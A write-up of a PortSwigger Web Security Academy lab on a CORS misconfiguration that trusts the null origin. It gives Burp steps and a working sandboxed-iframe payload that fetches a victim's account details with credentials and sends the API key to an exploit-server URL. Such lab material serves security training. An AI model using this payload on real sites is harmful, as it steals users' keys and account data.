# CORS vulnerability with trusted null origin

## Description

[This website](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack) has an insecure CORS configuration in that it trusts the `null` origin.  

## Reproduction and proof of concept

1. Start Burp, foxyproxy, and with intercept off, log in to the target site and access your account page.
2. In Burp, review the **HTTPhistory**. The API key is retrieved via an AJAX request to `/accountDetails`, and the response contains the `Access-Control-Allow-Credentials` header suggesting that it may support CORS.
3. Send the request to **Burp Repeater**, and resubmit it with the added header `Origin: null`. The "null" origin is reflected in the Access-Control-Allow-Origin header of the response.
4. Create exploit (replacing `lab-id` and `exploit-server-id`). The iframe sandbox generates a null origin request.

```text
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://lab-id.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='https://exploit-server-id.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
    };
</script>"></iframe>
```

5. Go to the exploit server and enter the exploit in the body field of the form.
6. Click **View exploit** and check you land on the log page and your API key is in the URL. 
7. **Deliver exploit to victim**.
8. Go to **Access log**
9. Copy the administrator's API key, and enter it as solution to the lab.

## Exploitability

To solve the lab, an attacker needs to craft some JavaScript that uses CORS to retrieve the administrator's API key and upload the code to the exploit server. The lab is solved when the attacker successfully submits the administrator's API key. An account with credentials `wiener:peter` is available.
